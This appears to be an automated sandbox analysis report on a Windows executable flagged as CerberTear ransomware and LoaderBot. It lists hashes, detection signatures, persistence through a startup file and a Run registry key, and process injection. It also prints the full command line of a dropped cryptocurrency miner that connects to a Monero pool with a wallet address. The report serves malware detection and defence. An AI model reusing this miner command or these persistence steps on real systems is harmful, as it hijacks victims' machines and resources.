Analysis
-
max time kernel
105s -
max time network
164s -
platform
windows10-2004_x64 -
resource
win10v2004-20220310-en -
submitted
25-03-2022 06:57
Static task
static1
Behavioral task
behavioral1
Sample
5622_1647967473_729.exe
Resource
win7-20220311-en
Behavioral task
behavioral2
Sample
5622_1647967473_729.exe
Resource
win10v2004-20220310-en
General
-
Target
5622_1647967473_729.exe
-
Size
4.0MB
-
MD5
0cfe05bcaa6d0ef8a21e01dcd298f1c8
-
SHA1
0dae542f14b5a4d2ab5bc3bb9571672a60efa47f
-
SHA256
bb2eb6165e8dccc7f52ac0a86b533656f4fdec8751dd46dd16243bf1fe012748
-
SHA512
b0d67335de0ff4c7d283e48b9a3078898c7ff38497277dd65d3113939e9447574079c021d69b8d989efb1366813b54e01efa016fbbf4b242a09018bedeb165f0
Malware Config
Signatures
-
suricata: ET MALWARE CerberTear Ransomware CnC Checkin
suricata: ET MALWARE CerberTear Ransomware CnC Checkin
-
LoaderBot executable 1 IoCs
resource yara_rule behavioral2/memory/1924-134-0x0000000000A00000-0x0000000000DFE000-memory.dmp loaderbot -
Executes dropped EXE 2 IoCs
pid Process 4164 Driver.exe 1760 Driver.exe -
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-2403053463-4052593947-3703345493-1000\Control Panel\International\Geo\Nation 5622_1647967473_729.exe -
Drops startup file 1 IoCs
description ioc Process File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Driver.url 5622_1647967473_729.exe -
Adds Run key to start application 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-2403053463-4052593947-3703345493-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Driver = "C:\\Users\\Admin\\AppData\\Roaming\\Sysfiles\\5622_1647967473_729.exe" 5622_1647967473_729.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Program crash 1 IoCs
pid pid_target Process procid_target 1576 4164 WerFault.exe 96 -
Suspicious behavior: EnumeratesProcesses 35 IoCs
pid Process 1924 5622_1647967473_729.exe 1924 5622_1647967473_729.exe 1924 5622_1647967473_729.exe 1924 5622_1647967473_729.exe 1924 5622_1647967473_729.exe 1924 5622_1647967473_729.exe 1924 5622_1647967473_729.exe 1924 5622_1647967473_729.exe 1924 5622_1647967473_729.exe 1924 5622_1647967473_729.exe 1924 5622_1647967473_729.exe 1924 5622_1647967473_729.exe 1924 5622_1647967473_729.exe 1924 5622_1647967473_729.exe 1924 5622_1647967473_729.exe 1924 5622_1647967473_729.exe 1924 5622_1647967473_729.exe 1924 5622_1647967473_729.exe 1924 5622_1647967473_729.exe 1924 5622_1647967473_729.exe 1924 5622_1647967473_729.exe 1924 5622_1647967473_729.exe 1924 5622_1647967473_729.exe 1924 5622_1647967473_729.exe 1924 5622_1647967473_729.exe 1924 5622_1647967473_729.exe 1924 5622_1647967473_729.exe 1924 5622_1647967473_729.exe 1924 5622_1647967473_729.exe 1924 5622_1647967473_729.exe 1924 5622_1647967473_729.exe 1924 5622_1647967473_729.exe 1924 5622_1647967473_729.exe 1924 5622_1647967473_729.exe 1924 5622_1647967473_729.exe -
Suspicious behavior: LoadsDriver 1 IoCs
pid Process 656 Process not Found -
Suspicious behavior: RenamesItself 1 IoCs
pid Process 1924 5622_1647967473_729.exe -
Suspicious use of AdjustPrivilegeToken 5 IoCs
description pid Process Token: SeDebugPrivilege 1924 5622_1647967473_729.exe Token: SeLockMemoryPrivilege 4164 Driver.exe Token: SeLockMemoryPrivilege 4164 Driver.exe Token: SeLockMemoryPrivilege 1760 Driver.exe Token: SeLockMemoryPrivilege 1760 Driver.exe -
Suspicious use of WriteProcessMemory 4 IoCs
description pid Process procid_target PID 1924 wrote to memory of 4164 1924 5622_1647967473_729.exe 96 PID 1924 wrote to memory of 4164 1924 5622_1647967473_729.exe 96 PID 1924 wrote to memory of 1760 1924 5622_1647967473_729.exe 102 PID 1924 wrote to memory of 1760 1924 5622_1647967473_729.exe 102
Processes
-
C:\Users\Admin\AppData\Local\Temp\5622_1647967473_729.exe"C:\Users\Admin\AppData\Local\Temp\5622_1647967473_729.exe"1⤵
- Checks computer location settings
- Drops startup file
- Adds Run key to start application
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: RenamesItself
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1924 -
C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe"C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 41jSnXa6AS1LinSidR94QphNgqEFhKqYo9scePhGMhywJWnTwSsuGQEB5bfnmLj4jhbTy7XcqukD3SHsxaXjDmrcTrjhskT -p x -k -v=0 --donate-level=0 -t 12⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:4164 -
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 4164 -s 7603⤵
- Program crash
PID:1576
-
-
-
C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe"C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 41jSnXa6AS1LinSidR94QphNgqEFhKqYo9scePhGMhywJWnTwSsuGQEB5bfnmLj4jhbTy7XcqukD3SHsxaXjDmrcTrjhskT -p x -k -v=0 --donate-level=0 -t 12⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:1760
-
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -pss -s 440 -p 4164 -ip 41641⤵PID:1056